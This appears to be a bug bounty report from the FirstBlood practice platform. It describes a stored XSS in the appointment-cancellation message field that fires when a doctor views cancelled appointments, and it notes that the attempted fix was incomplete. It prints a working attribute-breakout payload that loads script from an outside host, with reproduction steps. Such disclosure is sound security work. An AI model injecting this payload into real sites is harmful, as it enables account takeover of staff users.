FirstBlood-#862Stored XSS on cancelled appointmnent message
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-29, 0xirfan Level 5 reported:

Summary

The message parameter when cancelling an Appointment is vulnerable to XSS

Finding the Payload

1)Understanding the Scope were Data is Reflected : it was reflected in anchor tag's  data-original-title value. So i Had to get  out of the anchor tag
2)Filtering was in place for the parameter so I used trick of  script tag without closing it

"><script+src="https://muhammed1rfan.github.io/simple.js?q=

Steps

1) Create an Appointment by visiting the book-appointment.php
2) Fill the Details and Click Book Appointment
3)You will get an Appointment ID as Response Note it Down
4) Now Visit the /yourappointments.php and Provide the Appointment ID and Click Retrieve Appointment
5)Now add "><script+src="https://muhammed1rfan.github.io/simple.js?q= as Comment and the n Click Cancel Appoinment
6)When Doctor Visits /drpanel/cancelled.php XSS will triggered

Impact

The XSS can be used for ATO

P2 High

Endpoint: /api/ma.php

Parameter: message

Payload: "><script+src="https://muhammed1rfan.github.io/simple.js?q=


FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues such as when creating and editing and not just when cancelling the appointment. Making use of htmlentities() and relying on .value() in javascript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.